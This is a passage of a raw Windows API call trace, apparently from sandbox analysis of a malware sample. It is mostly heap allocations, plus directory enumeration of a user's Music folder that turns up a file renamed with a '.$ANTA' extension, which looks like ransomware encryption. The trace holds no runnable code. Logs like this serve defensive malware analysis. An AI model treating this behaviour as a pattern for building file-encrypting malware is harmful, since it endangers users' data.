Size=0x4) returned 0x43e2610 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.869] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0113.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0113.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4e) returned 0x436a240 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0113.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0113.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0114.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0114.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.183] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0114.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.184] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.184] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0114.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.185] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0114.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0114.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.185] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp")) returned 0x10 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.185] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0114.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0114.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.186] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.187] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0114.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0114.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0114.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc2064c0, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x1000420c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1000420c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca5e0, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0114.188] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc2064c0, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x1000420c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1000420c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca5e0, cFileName="..", cAlternateFileName="")) returned 1 [0114.189] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd55747, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xfd55747, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xfe3a54e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xc4a0, dwReserved0=0x0, dwReserved1=0x43ca5e0, cFileName="fKGiw.wav.$ANTA", cAlternateFileName="FKGIWW~1.$AN")) returned 1 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.189] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.189] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0114.190] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.190] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.190] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, 